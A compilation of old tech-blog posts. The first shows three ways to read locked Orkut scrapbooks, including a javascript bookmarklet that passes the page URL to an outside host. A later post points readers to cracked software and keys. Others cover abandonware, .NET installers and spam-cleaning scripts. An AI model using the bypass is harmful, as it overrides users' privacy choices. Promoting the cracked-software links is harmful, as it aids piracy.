3 ways to read locked scrapbook on orkut!

Here comes another blow to the orkut’s privacy features! This time scrapbook privacy has been compromised and considering 3 ways to do this it may take some time for orkut to revert back! What worsen things for orkut is that this bug is in orkuts sandbox – part of Googles much hyped newly launched Open Social Platform!

Say you are orkutting and bumped into a screen saying “This content has been set to private by the profile owner” when you click on a persons scrapbook! Also see following screenshot…

Now we have 3 ways read locked scrapbook!

#1. Orkut Sandbox

This will work only if if you have access to sandbox.

Note www in URL before orkut.com and just change it to sandbox!

So

http://www.orkut.com/scrapbook.aspx?uid=[some_num]

will become..

http://sandbox.orkut.com/scrapbook.aspx?uid=[some_num]

#2. JavaScript

A little javascript will redirect you to a page where unlocked scrapbook waiting for you. Just put following javascript code in browsers address/navigation bar and hit enter!

javascript:document.location='http://rodlac.freetzi.com/ViewScraps.php?uid='+encodeURIComponent(location.href);void(0)

You can also use following bookmarklet if your browse supports it!

#3. GreaseMonkey Script

If you want to read many locked scrapbooks then it will be better to automate this for once!

2 Best Places To Find Abandonware i.e. Abandoned Softwares, Games, Tools, etc!

Few months back I wrote about how to find old version of your favorite softwares. This time its about abandoned softwares, games, tools, etc collectively called abandonware.

As per wikipedia,  "Abandonware refers to computer software that is no longer current…."

So lets find out where to find out abandonwares…

 

#1. Vetusware 

This site claims to be the biggest free abandonware downloads collection in the universe. Large number of softwares and on top of it they are well organized by…

  • category (e.g. Games, Multimedia, System, etc)
  • manufacturer (e.g. Adobe, Microsoft, Novell, etc)
  • operating system (e.g. Dos, Windows XP, etc)

They also maintains list of popular downloads, search engine, blog, forum, request form, etc.

The site is completely free where to download more you have to contribute more.  Smallest you can contribute is finding a spelling error on any of its page! Yep they don’t ask for money honey! 😉

 

  #2. Abandonia

This site is dedicated to classic (read abandoned) DOS games. So if you are not a gamer skip this site.

But for gamers the site maintains games into 12 categories.

 

#3. Directory

I also noticed following too sites which maintains information about other abandonwares sites. So these are like directories holding meta information.

Download Complete Microsoft .NET Framework 3.5 Setup

Many new Windows applications requires latest version of Microsoft .NET framework which is version 3.5 at the time of of writing of this post.

If you go to Microsoft download center, then by default you will get live installer of approximately 2-3 MB’s while complete .NET framework requires 50-200 MB. Actually on the same page there are links to complete setup but they are placed in a way that anyone can hardly notice them. Seems like Microsoft wants you to download live installer but there are problems with live installer…

  1. It may hang forever if you have slow internet connection like dial-up, GPRS, etc.
  2. You can not use it at all if your computer is not connected to internet 🙁
  3. Also if you are running pirated Windows better not to use any software/installer from Microsoft which connects to Internet.

IgnoreAll Button to avoid Facebook invitation spam!

Today I read how people are getting annoyed with Facebook applications invitation spamming and decided to solve the problem on my own!

As usual all I needed was another GreaseMonkey script which could just click all ignore buttons in one go!

So here is my work! It just adds a button with label Ignore All and do I need to say explicitly what this button does? 😉

Installation:

(Note: This is GreaseMonkey script thus Firefox and GreaseMonkey add-on is must!)

  1. Download Firefox (if you don’t have it)
  2. Install GreaseMonkey extension (you may need to restart your browser)
  3. Click here to install this IgnoreAll Facebook application invitation script!

If you have successfully installed this script, you will see a Ignore ALL button on right panel of requests page! (Also see screenshot)

That’s it, hit it and all SPAM will disappear in seconds! 🙂

Don’t worry about genuine stuff from Facebook itself, like…

  1. New friend requests
  2. Friend detail requests
  3. Group Invitation

So its time to clean Facebook… 🙂

Above will add a "Ignore ALL" bookmark on browsers bookmark toolbar. Next time when you visit it, just click on that "Ignore ALL" bookmark and all the spam will disappear. (Need video tutorial?)

3 Free Sites for Downloading Old Versions of your favorite Software!

Sometimes upgrading to a newer version can be a good thing. Other times, your computer may not be compatible with the new version, the new version is bloated, or all the options you liked are no longer available.

There could be many reasons where you like old version of a software and want to use it only! If you maintain your favorite softwares in their favorite versions thats fine but often you will find yourself browsing website of a software company for old versions of a particular software. Unfortunately not all software provider are interested in keeping old version available for downloads.

Here comes to rescue following 3 sites whose only purpose is to maintain old versions for free download. These three are almost identical in operation (in fact I had hard time to figure out differences to write about)

1. OldApps.com (Exclusively for Mac OS)

2. OldVersion.com

  • Softwares are not sorted but seems to maintain largest collection. Also noticed few Linux softwares.

3. Old-Versions.net

  • It maintains a drop-down menu in right sidebar through which you can really reach your favorite softwares version page with just one-click (and without typing too!)!

All 3 have a contribute section so that you can upload old versions of softwares you posses to their repository. Also OldApps and OldVersion have forums where you can discuss various issues related to software versions, etc!

Finally on personal note, few software I havent upgraded over a year includes…

  • Winamp v2.73 – I love mplayer for movies. So why to go for winamp with video capability! 😉
  • ACDSee v3.0 – Image browsing application. Reason: New Versions are bulky and memory consuming.

Making New Orkut Compatible With Higher Resolution on Widescreen Monitors!

Useful web sites for torrents, software, games, etc downloads & free SMS!

#For FREE Online SMS

  1. www.mobik.com – This is one I just came around today. Nice one but one problem! You can send SMS to only the person who have registered on it! That means only if your friend is a member of mobik then only you can send a SMS to him!
  2. www.yaari.com – I used this to send whole pages thorough SMS. But with rise in the traffic the massages may take ages to reach but otherwise it has no problem like mobik! You can send SMS to the anyone! No membership is required!

#For Torrent Downloads…

Torrent is a nice way to download any sort of stuff – softwares, movies, games, etc (anything you can imagine in digital format) but the only problem comes when the seeders are less in numbers than the leachers, then the speed is really slow!

  1. www.torrentz.com – This is a free site. It does not require any account or anything. Here you can get almost anything you want to search for. After searching the item please make sure that the host you decide to download from has more seeders than leachers. Rest enjoy!
  2. www.desitorrents.com – This is not a free site. You have to have a account with it to download. This site provides you with all the Hindi stuff like movies music videos, mp3’s and also of other Indian language! Here also please make sure you have enough seeders!

Apart from torrent site listed above there are other options too as torrent sometime does not work in LAN environment!

  1. www.ddl2.com – This website provides every software in the world (it has never disappointed me). It gives u rapidshare links or other links from where you can download the software. The softwares are always in their full versions or with cracks, keys!
  2. www.LimeWire.com – You can download the pro-version of LimeWire from the above options(torrents/ddl2) as its not free! Once you are in the programs option search for the required software, games, etc and its done!

BUT please be sure that what you dowload is not a virus or trojan…

how can you do this???

The unwanted material is in KBs. The name that appears is same as what you searched for but you will see the required softwares are larger in size say MBs than the unwated stuff which is in KBs!

Also use best antivirus!

Orkut Message Cleaner Script!

Long Long time ago… some of my orkut friends requested me to write a greasemonkey script to clean orkut message box!

If your message box has been flooded with 1000’s of messages, most of them are junk you would like to clean them all at once as most of us gets our imortant mails on services like gmail, yahoo, hotmail and others!

Enough chit-chat, lets clean it once…
